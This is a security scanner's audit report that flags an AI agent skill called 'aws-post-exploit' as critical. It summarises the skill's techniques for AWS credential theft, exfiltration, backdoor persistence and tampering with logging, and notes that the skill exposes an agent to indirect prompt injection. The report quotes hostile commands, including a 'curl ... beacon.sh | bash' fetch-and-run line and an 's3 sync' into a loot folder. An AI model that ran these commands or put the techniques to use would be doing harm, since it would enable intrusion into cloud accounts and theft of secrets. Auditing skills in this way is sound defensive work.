aws-post-exploit

Fail

Audited by Snyk on May 4, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). The prompt explicitly instructs retrieving AWS secrets (SecretsManager, SSM parameters, create-access-key, Lambda env vars, etc.) and shows exfiltration patterns that would require the agent to capture and emit secret values verbatim, creating a direct exfiltration risk.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content is a clear, comprehensive playbook for malicious AWS post-exploitation—documenting explicit data exfiltration techniques, credential theft, backdoor/persistence methods (IAM backdoors, Lambda layers/extensions/alias-weighting, EventBridge/SSM/EC2 persistence), and audit/monitoring evasion (CloudTrail/GuardDuty/FlowLogs/Config tampering)—and thus constitutes intentionally malicious behavior and backdoor instructions.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The skill's required workflows (SKILL.md and references/data-exfiltration.md) instruct the operator to fetch and inspect untrusted user-generated content (e.g., aws s3 sync s3:// ./loot/, aws lambda get-function --query 'Code.Location' ... | xargs curl -o function.zip, and downloading Layer/Code.Location URLs), meaning the agent would download and interpret arbitrary third‑party S3/Lambda/code artifacts that could embed instructions influencing subsequent actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill contains runtime commands that fetch and execute remote code (e.g., "curl https:///beacon.sh | bash" and similar SSM/UserData examples), so the external URL https:///beacon.sh is a runtime dependency that would execute remote code.

Issues (4)

  • W007 (HIGH): Insecure credential handling detected in skill instructions.
  • E006 (CRITICAL): Malicious code pattern detected in skill scripts.
  • W011 (MEDIUM): Third-party content exposure detected (indirect prompt injection risk).
  • W012 (MEDIUM): Unverifiable external dependency detected (runtime URL that controls agent).

Audit Metadata
Risk Level: CRITICAL
Analyzed: May 4, 2026, 08:15 AM
Issues: 4